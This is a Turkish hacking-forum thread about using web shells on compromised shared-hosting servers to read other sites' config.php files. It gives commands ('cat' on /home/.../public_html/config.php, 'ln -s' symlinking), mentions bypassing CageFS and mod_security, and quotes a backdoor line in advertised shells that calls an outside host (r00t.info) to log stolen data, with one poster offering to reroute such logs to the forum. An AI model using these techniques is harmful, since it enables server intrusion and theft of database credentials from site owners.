Cmd shell ile sw gecme

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Atess/44imha

Onursal Ünvan
Rating - 0%
Girdiğimiz Herhangi Bir sw de
Cogu Durumlarda Telnet çalışmaz foksiyonlar kapalı olur telnet vs symlink ıle cektıgınız confıgler Permison verır okuyamayız vs vs .
Bu Durumlarda devreye Cmd shellı sokuyoruz

cekmek ıstedıgımız confıgı
cat -n /home/site.com/public_html/config.php
veya ln -s komutu kafanıza göre
%60 confıg okuma oranı serverın durumuna gore ( Resimler Örnek Dir .. )
J2YvME.jpg

nr7Baa.jpg

Rating - 95.8%
Öyle sw ler varki ne yaparsanız yapın geçemessiniz , sonra birden aklınıza eski ve ilk en basit yöntem olan cat /home/user/public_html/config.php yapmak gelir ve bi bakarsınız okur , defalarca bunu yaşadım , yani basit demeden her yöntemi tek tek denemelisiniz.

Atess/44imha

Onursal Ünvan
Rating - 0%
Eskıden Sitelerin serverlarındakı acıkları fazlaydı bi şekilde okunuyordu. Şimdi herkez akıllandı Genede dediğin gibi bütün yolları denemekde fayda var

Rating - 0%
O degilde 2016 serverlerde genelikle cloudlinux cagefs, mod security var öncelik bunlari bypass etmek.

The_DeMoN

Dost
Rating - 0%
Kendini nasıl da belli ediyor. shell reklamı yapıyor adam resmen. bunu belirtmen lazım. ama sırf sen gibilerin inadına temizleyip de paylaşacam. Ama spyhackerz yönetimi onaylarsa. istek shelleri alırım temizler veririm. bari bu forumdakiler temiz kullansın.

Cewo ekmeği ordan çıkıyorda bu foruma yeni katılan arkadaşların böyle loglu shelleri kullanmasını istermisin? emekle shell upload edecek sonra yamyamlar konacak üstüne :D

Bunlarınkı armut piş azıma düş hesabı

izocinin birkaç shelli hariç çoğu edit shell. başkasının shellini alıp boyayım loglayıp ben yaptım demek de olmaz. Tamam priv8 olur satarsın anlarım dostum. ama koskoca reklamda logsuz tertemiz shell nedir?

Logsuz Shell istasyonu Bizi Tercih Ettiginiz icin
[Thank You!~ ]

Herkesi kek mi sanıyosunuz?

$retValue = file_get_contents http://r00t.info/bot/yaz.php?

nerlere gizlemişler :D daha neler var neler.....

Son düzenleme:
Rating - 0%
Kendini nasıl da belli ediyor. shell reklamı yapıyor adam resmen. bunu belirtmen lazım. ama sırf sen gibilerin inadına temizleyip de paylaşacam. Ama spyhackerz yönetimi onaylarsa. istek shelleri alırım temizler veririm. bari bu forumdakiler temiz kullansın.

Cewo ekmeği ordan çıkıyorda bu foruma yeni katılan arkadaşların böyle loglu shelleri kullanmasını istermisin? emekle shell upload edecek sonra yamyamlar konacak üstüne :D

izocinin birkaç shelli hariç çoğu edit shell. başkasının shellini alıp boyayım loglayıp ben yaptım demek de olmaz. Tamam priv8 olur satarsın anlarım dostum. ama koskoca reklamda logsuz tertemiz shell nedir?

Logsuz Shell istasyonu Bizi Tercih Ettiginiz icin
[Thank You!~ ]

Herkesi kek mi sanıyosunuz?

$retValue = file_get_contents http://r00t.info/bot/yaz.php?

nerlere gizlemişler :D daha neler var neler.....
Bunlari temizleyip paylaş haci.

The_DeMoN

Dost
Rating - 0%
root infodan hangisini istiyorsun. baya zaman alıyor da. ayrıca hata vermemsi için başka email adresi veya js ye yönlendirme yapmam lazım. olmazsa spyhackerz in kendi log havuzuna gönderelim. yabancıya gitmesin. bence priv7 shelli çok güzel toplanmış ama 10 yerinde log var.

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
131,516Konular
3,268,897Mesajlar
315,322Kullanıcılar
lidgfguyuuiSon Üye
Üst Alt